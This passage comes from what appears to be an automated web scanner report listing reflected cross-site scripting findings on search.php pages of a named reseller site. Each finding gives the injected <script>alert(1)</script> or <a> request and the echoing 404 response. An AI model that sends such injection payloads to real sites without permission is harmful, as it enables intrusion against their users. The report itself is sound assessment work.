GET /detail/30/themes67c00<script>alert(1)</script>218a5fddf41/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes67c00<script>alert(1)</script>218a5fddf41/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2132. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 610a2<script>alert(1)</script>2ee75bc4ac9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos610a2<script>alert(1)</script>2ee75bc4ac9/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos610a2<script>alert(1)</script>2ee75bc4ac9/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2133. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffcc5<script>alert(1)</script>58ceb62740c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesffcc5<script>alert(1)</script>58ceb62740c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesffcc5<script>alert(1)</script>58ceb62740c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2134. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8926c<script>alert(1)</script>2597938f910 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating8926c<script>alert(1)</script>2597938f910/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating8926c<script>alert(1)</script>2597938f910/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2135. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 44fb1<script>alert(1)</script>6723b762042 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/search.php44fb1<script>alert(1)</script>6723b762042?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php44fb1<script>alert(1)</script>6723b762042?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2136. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 312a1<a>0c5940fca50 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search312a1<a>0c5940fca50&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search312a1<a>0c5940fca50&opt=2 was not found on this server.</p>
...[SNIP]...

2.2137. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f535b<a>765a309f3a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...f535b<a>765a309f3a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...f535b<a>765a309f3a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2138. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1fd9f<script>alert(1)</script>e07ebc70d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1fd9f<script>alert(1)</script>e07ebc70d1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1fd9f<script>alert(1)</script>e07ebc70d1b=1 was not found on this server.</p>
...[SNIP]...

2.2139. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 115f5<a>c5ad1e63ea2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2115f5<a>c5ad1e63ea2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2115f5<a>c5ad1e63ea2 was not found on this server.</p>
...[SNIP]...

2.2140. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f8d8<script>alert(1)</script>d2934478a69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f8d8<script>alert(1)</script>d2934478a69/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f8d8<script>alert(1)</script>d2934478a69/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2141. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf13e<script>alert(1)</script>eb8a714ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30cf13e<script>alert(1)</script>eb8a714ed4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30cf13e<script>alert(1)</script>eb8a714ed4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2142. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 339c1<script>alert(1)</script>12e12520c05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes339c1<script>alert(1)</script>12e12520c05/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes339c1<script>alert(1)</script>12e12520c05/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2143. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 835a9<script>alert(1)</script>811308548d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos835a9<script>alert(1)</script>811308548d9/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos835a9<script>alert(1)</script>811308548d9/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2144. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 67e73<script>alert(1)</script>164be6f55b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images67e73<script>alert(1)</script>164be6f55b3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images67e73<script>alert(1)</script>164be6f55b3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2145. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1c114<script>alert(1)</script>179f0e594f8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/search.php1c114<script>alert(1)</script>179f0e594f8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php1c114<script>alert(1)</script>179f0e594f8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2146. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3cc50<a>a9a79763188 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3cc50<a>a9a79763188&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3cc50<a>a9a79763188&opt=2 was not found on this server.</p>
...[SNIP]...

2.2147. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload dd39a<a>26ec7ce5e9b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...dd39a<a>26ec7ce5e9b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...dd39a<a>26ec7ce5e9b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2148. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload be753<script>alert(1)</script>80bf349cfd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&be753<script>alert(1)</script>80bf349cfd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
